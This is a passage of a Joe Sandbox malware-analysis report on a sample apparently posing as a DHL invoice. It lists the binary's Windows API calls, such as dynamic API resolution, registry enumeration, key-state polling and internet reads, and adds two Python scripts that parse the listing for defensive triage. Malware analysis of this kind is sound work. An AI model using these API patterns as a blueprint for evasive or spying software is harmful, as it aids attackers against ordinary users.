                                                                                                                         • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3488606520-0
                                                                                                                        • Opcode ID: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                                                                                                                        • Instruction ID: 958960a49654da01ba0cf19cd4ffe243457c0b4a181f2a23d8ccf5cf024afa7a
                                                                                                                        • Opcode Fuzzy Hash: 061843cfc38672f311a67a32301b2cae17436c713527b691337b5a5cf1aed5ea
                                                                                                                        • Instruction Fuzzy Hash: 53A1B175604700AFD721DF24C886F2AB7E5AF84714F14881DF69A9F792DB70EC418B92
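The entries above that matter most when triaging this listing are the dynamic-resolution chains (LoadLibrary or GetModuleHandle, then GetProcAddress, with the resolved name appearing only as a String ID such as Wow64DisableWow64FsRedirection, GetSystemWow64DirectoryW or CorExitProcess) and the OpenProcess call whose desired-access argument is printed as a raw hex word (00000410). The Python below is an added example, not Joe Sandbox output and not code from the analysed sample: it parses the report's "APIs" bullets from a constructed excerpt that mirrors the entries shown, pairs each GetProcAddress with the module loaded just before it in the same function, and decodes the OpenProcess access mask into its PROCESS_* constants. The regex, the function names and the excerpt are this example's own assumptions about the report's text format; where the listing shows no module argument (the LoadLibraryA at 0038D3AD) the module is reported as "?" rather than guessed.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample input: "APIs" blocks in the shape the report prints above
# (one "APIs" header per disassembled function, one bullet per call).
SAMPLE_REPORT = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00354D1E), ref: 00354D8D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00354DA0
• FreeLibrary.KERNEL32(00000000,?,?,?,00354D1E), ref: 00354DC3
APIs
• LoadLibraryA.KERNEL32 ref: 0038D3AD
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038D3BF
• FreeLibrary.KERNEL32(00000000), ref: 0038D3E5
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
• FreeLibrary.KERNEL32(00000000,?,?,00334EDD), ref: 00334EC0
APIs
• GetCurrentProcessId.KERNEL32 ref: 003BA427
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BA435
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BA468
"""

# One call bullet: "[• ][Part of subcall function X: ]Api.MODULE[(args)], ref: HEX"
# (assumed format, derived from the lines shown in the report).
_CALL_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function \w+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

Call = Tuple[str, str, List[str], str]  # (api, module, args, ref)

# Which argument of each loader carries the module name; the Ex variants
# take a flags word first.
_LOADER_LIB_ARG = {
    "LoadLibraryA": 0, "LoadLibraryW": 0, "LoadLibraryExA": 0, "LoadLibraryExW": 0,
    "GetModuleHandleA": 0, "GetModuleHandleW": 0,
    "GetModuleHandleExA": 1, "GetModuleHandleExW": 1,
}
# "?" is the report's placeholder for an unknown value; an 8-hex-digit word
# is a raw pointer/handle, not a name.
_UNRESOLVED = re.compile(r"^(\?|[0-9A-Fa-f]{8})$")

_PROCESS_ACCESS = [  # Win32 PROCESS_* access-right bits (documented values)
    (0x0001, "PROCESS_TERMINATE"), (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0008, "PROCESS_VM_OPERATION"), (0x0010, "PROCESS_VM_READ"),
    (0x0020, "PROCESS_VM_WRITE"), (0x0040, "PROCESS_DUP_HANDLE"),
    (0x0080, "PROCESS_CREATE_PROCESS"), (0x0100, "PROCESS_SET_QUOTA"),
    (0x0200, "PROCESS_SET_INFORMATION"), (0x0400, "PROCESS_QUERY_INFORMATION"),
    (0x0800, "PROCESS_SUSPEND_RESUME"), (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
]


def parse_api_blocks(text: str) -> List[List[Call]]:
    """Split the report text on its 'APIs' headers and parse each call bullet."""
    blocks: List[List[Call]] = []
    current: Optional[List[Call]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            blocks.append(current)
            continue
        m = _CALL_RE.match(line)
        if m is None or current is None:
            continue  # hashes, dump sources and other headers are not calls
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        current.append((m.group("api"), m.group("module"), args, m.group("ref")))
    return blocks


def _name_or_unknown(value: Optional[str]) -> str:
    return "?" if value is None or _UNRESOLVED.match(value) else value


def find_dynamic_imports(blocks: List[List[Call]]) -> List[Tuple[str, str, str]]:
    """Pair each GetProcAddress with the most recent loader call in its function.

    Returns (module, symbol, ref) triples; module is "?" when the listing
    does not show the loaded name (nothing is guessed)."""
    found: List[Tuple[str, str, str]] = []
    for calls in blocks:
        pending_module = "?"
        for api, _module, args, ref in calls:
            if api in _LOADER_LIB_ARG:
                idx = _LOADER_LIB_ARG[api]
                pending_module = _name_or_unknown(args[idx] if len(args) > idx else None)
            elif api == "GetProcAddress":
                symbol = _name_or_unknown(args[1] if len(args) > 1 else None)
                found.append((pending_module, symbol, ref))
    return found


def decode_process_access(mask: int) -> List[str]:
    """Expand an OpenProcess dwDesiredAccess word into its PROCESS_* names."""
    return [name for bit, name in _PROCESS_ACCESS if mask & bit]


def find_open_process_calls(blocks: List[List[Call]]) -> List[Tuple[str, int, List[str]]]:
    """Return (ref, mask, decoded names) for every OpenProcess with a literal mask."""
    out: List[Tuple[str, int, List[str]]] = []
    for calls in blocks:
        for api, _module, args, ref in calls:
            if api != "OpenProcess" or not args:
                continue
            try:
                mask = int(args[0], 16)
            except ValueError:
                continue  # "?" placeholder: mask not recovered by the sandbox
            out.append((ref, mask, decode_process_access(mask)))
    return out


if __name__ == "__main__":
    parsed = parse_api_blocks(SAMPLE_REPORT)
    for module, symbol, ref in find_dynamic_imports(parsed):
        print(f"{ref}: GetProcAddress({module}, {symbol})")
    for ref, mask, names in find_open_process_calls(parsed):
        print(f"{ref}: OpenProcess(0x{mask:X}) = {' | '.join(names)}")
```

The point of pairing loader and GetProcAddress inside one block rather than across the whole listing is that the report groups calls per disassembled function, so a module loaded in one function says nothing about a lookup in another; the same grouping is why the GetSystemWow64DirectoryW lookup stays attributed to an unknown module here.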
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
                                                                                                                        • _free.LIBCMT ref: 0036BB7F
                                                                                                                          • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000), ref: 003629DE
                                                                                                                          • Part of subcall function 003629C8: GetLastError.KERNEL32(00000000,?,0036D7D1,00000000,00000000,00000000,00000000,?,0036D7F8,00000000,00000007,00000000,?,0036DBF5,00000000,00000000), ref: 003629F0
                                                                                                                        • _free.LIBCMT ref: 0036BD4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1286116820-0
                                                                                                                        • Opcode ID: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                                                                                                                        • Instruction ID: 3c1fa9cb9c37e2ad0fc86afb405064e7a7cf991b02963623b79964e2eb46c018
                                                                                                                        • Opcode Fuzzy Hash: d63d2feb1da31bd470bae590e8b424b54cd276fa8d53352d583df0b25c74f9fd
                                                                                                                        • Instruction Fuzzy Hash: 15510A719002099FC712DF659D8196EF7BCEF41350F11826AE554EB2A9EB309E818F54
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0039CF22,?), ref: 0039DDFD
                                                                                                                          • Part of subcall function 0039DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0039CF22,?), ref: 0039DE16
                                                                                                                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0039E473
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0039E4AC
                                                                                                                        • _wcslen.LIBCMT ref: 0039E5EB
                                                                                                                        • _wcslen.LIBCMT ref: 0039E603
                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0039E650
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3183298772-0
                                                                                                                        • Opcode ID: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                                                                                                                        • Instruction ID: 9d367ade4dc69f27ab2a31053f0fda3f56ce9cde9a2addb7b77e17940341b2ce
                                                                                                                        • Opcode Fuzzy Hash: 9bd0c7a7012ceca85a29947a048989919245c98de6f62dea7f4562a40b2884bb
                                                                                                                        • Instruction Fuzzy Hash: 525141B24083459BCB26DB94D881EDFB3ECAF85340F00491EF589D7191EF74A688C766
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBAA5
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBB00
                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003BBB63
                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 003BBBA6
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003BBBB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 826366716-0
                                                                                                                        • Opcode ID: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                                                                                                                        • Instruction ID: 639a6c44f798f4a7b9ba16b7f86c721847dc988a41d0f04f78a9cd09de1b61a7
                                                                                                                        • Opcode Fuzzy Hash: 02e1527146212cedc308f5c71103d0455dff48c72067d180d041f49c20bf889a
                                                                                                                        • Instruction Fuzzy Hash: 8F61AD31608201EFD316DF14C890E6ABBE9FF84308F14859DF5998B6A2CB71ED45CB92
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00398BCD
                                                                                                                        • VariantClear.OLEAUT32 ref: 00398C3E
                                                                                                                        • VariantClear.OLEAUT32 ref: 00398C9D
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00398D10
                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00398D3B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4136290138-0
                                                                                                                        • Opcode ID: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                                                                                                                        • Instruction ID: 3c793f7b76a88bbc1dcc37bfbf5bc16f507c36b18f0a364cd25c84b83973ea36
                                                                                                                        • Opcode Fuzzy Hash: e3f905b0edbd4ad283616ab84f4229394e750e9ba2b3628608b3598fbb298a4d
                                                                                                                        • Instruction Fuzzy Hash: 5D5145B5A00619EFCB15CF68C894AAAB7F8FF89314B158559E909DB350E730E911CF90
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003A8BAE
                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003A8BDA
                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003A8C32
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003A8C57
                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003A8C5F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2832842796-0
                                                                                                                        • Opcode ID: b7c58e4d433a93a86c5de60a1ad83a44abe7fef2e164a64725c2b35cd58113af
                                                                                                                        • Instruction ID: 06ddc51ca63aaa7d1a244079a263ef3db971b1cf23f2b551915469ba50e4e175
                                                                                                                        • Opcode Fuzzy Hash: b7c58e4d433a93a86c5de60a1ad83a44abe7fef2e164a64725c2b35cd58113af
                                                                                                                        • Instruction Fuzzy Hash: 46513975A00218AFDB16DF65C880A69BBF5FF49314F088458E849AF362CB31ED51CF90
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 003B8F40
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B8FD0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 003B8FEC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 003B9032
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003B9052
                                                                                                                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003A1043,?,7529E610), ref: 0034F6E6
                                                                                                                          • Part of subcall function 0034F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0038FA64,00000000,00000000,?,?,003A1043,?,7529E610,?,0038FA64), ref: 0034F70D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 666041331-0
                                                                                                                        • Opcode ID: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                                                                                                                        • Instruction ID: 8d24ec9d328099b3fb8ceb2b4a67339d96734158abd58912dd914a3146f0ae6f
                                                                                                                        • Opcode Fuzzy Hash: b95c5d202aab83a0615b58e6c046f85666f09aca4b7d57fb984e86d8fe8cff8b
                                                                                                                        • Instruction Fuzzy Hash: 17513935604205DFCB12EF54C4849ADBBB5FF49318F098099EA0A9F762DB31ED86CB90
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                                                                                                                        • Instruction ID: 0208b904a2b4c30c98fd4c8f48059fc68711eeb4312fa82ef1f96fbfa1c50f18
                                                                                                                        • Opcode Fuzzy Hash: 3271823b89ac790d633a7020833bba8ff7b2b24a4ef7a6a358bb73500c9ac106
                                                                                                                        • Instruction Fuzzy Hash: 3A41D032A006049FCB26DF78C980A6EB3E5EF89314F168568E915EF359DA31AD01CB80
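The per-function listings above are machine-generated and long, so a first triage pass usually means pulling the API chains out of them mechanically and flagging the combinations an analyst cares about (dynamic API resolution through LoadLibraryW/GetProcAddress, registry enumeration through RegOpenKeyExW/RegEnumKeyExW, key-state polling through GetAsyncKeyState). The following Python is an added example and is not part of the Joe Sandbox report or its tooling. It parses lines in the format shown on this page (direct calls and "Part of subcall function" lines), groups them per "APIs" entry, and flags chains. The chain names, the flagging rules and SAMPLE_REPORT are my own constructions; the sample reuses API lines and addresses copied from this page.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One API line of a Joe Sandbox IDA-plugin listing, in the three shapes seen
# on this page:
#   • GetProcAddress.KERNEL32(00000000,?), ref: 003B8FD0
#   • _free.LIBCMT ref: 0036BB7F
#   • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(...), ref: 003629DE
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Heuristic chains (my own choice, not the report's rule set): a hit needs one
# API from the first set and, when the second set is non-empty, one from it.
CHAINS = {
    "dynamic API resolution": ({"LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"},
                               {"GetProcAddress"}),
    "registry enumeration": ({"RegOpenKeyExW", "RegOpenKeyExA"},
                             {"RegEnumKeyExW", "RegEnumKeyExA", "RegEnumValueW"}),
    "key/mouse state polling": ({"GetAsyncKeyState", "GetKeyState"}, set()),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: str
    subcall_of: Optional[str]  # callee address when the call is indirect


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)

    @property
    def apis(self) -> set:
        return {c.api for c in self.calls}

    @property
    def label(self) -> str:
        # The listing carries no function address, so use the lowest direct
        # call site as a stable handle for the entry.
        direct = [c.ref for c in self.calls if c.subcall_of is None]
        return "ref " + min(direct or [c.ref for c in self.calls])


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split a listing into entries at each 'APIs' header; ignore dump metadata."""
    entries: List[FunctionEntry] = []
    current: Optional[FunctionEntry] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            current.calls.append(
                ApiCall(m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
    return entries


def flag_entry(entry: FunctionEntry) -> List[str]:
    apis = entry.apis
    return sorted(name for name, (first, second) in CHAINS.items()
                  if apis & first and (not second or apis & second))


def triage(text: str) -> List[Tuple[str, List[str]]]:
    """Return (entry label, flagged chains) for every entry that hits a chain."""
    out = []
    for entry in parse_entries(text):
        hits = flag_entry(entry)
        if hits:
            out.append((entry.label, hits))
    return out


# Constructed excerpt: four entries built from API lines on this page, with a
# Memory Dump Source block in between to show that it is skipped.
SAMPLE_REPORT = """\
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
• _free.LIBCMT ref: 0036BB7F
  • Part of subcall function 003629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0036D7D1), ref: 003629DE
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BBAA5
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BBB00
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003BBB63
• RegCloseKey.ADVAPI32(00000000), ref: 003BBBB3
APIs
• LoadLibraryW.KERNEL32(?,00000000,?), ref: 003B8F40
• GetProcAddress.KERNEL32(00000000,?), ref: 003B8FD0
• FreeLibrary.KERNEL32(00000000), ref: 003B9052
APIs
• GetCursorPos.USER32(?), ref: 00349141
• GetAsyncKeyState.USER32(00000001), ref: 00349183
"""

if __name__ == "__main__":
    for label, hits in triage(SAMPLE_REPORT):
        print(label, "->", ", ".join(hits))
```

One caveat when reading the hits against this sample: the report's signatures say the binary is likely a compiled AutoIt script, and every function listed here sits in the module at offset 00330000, i.e. the AutoIt runtime stub rather than the embedded script. The AutoIt interpreter itself uses LoadLibraryW/GetProcAddress (DllCall) and GetAsyncKeyState (GUI handling), so a chain hit in this module describes what the runtime can do, not what this sample's script does; weigh it together with the extracted script and the behavioural signatures at the top of the report.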
APIs
• GetCursorPos.USER32(?), ref: 00349141
• ScreenToClient.USER32(00000000,?), ref: 0034915E
• GetAsyncKeyState.USER32(00000001), ref: 00349183
• GetAsyncKeyState.USER32(00000002), ref: 0034919D
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
APIs
• GetInputState.USER32 ref: 003A38CB
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 003A3922
• TranslateMessage.USER32(?), ref: 003A394B
• DispatchMessageW.USER32(?), ref: 003A3955
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACF38
• InternetReadFile.WININET(?,00000000,?,?), ref: 003ACF6F
• GetLastError.KERNEL32(?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFB4
• SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFC8
• SetEvent.KERNEL32(?,?,00000000,?,?,?,003AC21E,00000000), ref: 003ACFF2
APIs
• GetWindowRect.USER32(?,?), ref: 00391915
• PostMessageW.USER32(00000001,00000201,00000001), ref: 003919C1
• Sleep.KERNEL32(00000000,?,?,?), ref: 003919C9
• PostMessageW.USER32(00000001,00000202,00000000), ref: 003919DA
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 003919E2
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 003C5745
• SendMessageW.USER32(?,00001074,?,00000001), ref: 003C579D
• _wcslen.LIBCMT ref: 003C57AF
• _wcslen.LIBCMT ref: 003C57BA
• SendMessageW.USER32(?,00001002,00000000,?), ref: 003C5816
APIs
• IsWindow.USER32(00000000), ref: 003B0951
• GetForegroundWindow.USER32 ref: 003B0968
• GetDC.USER32(00000000), ref: 003B09A4
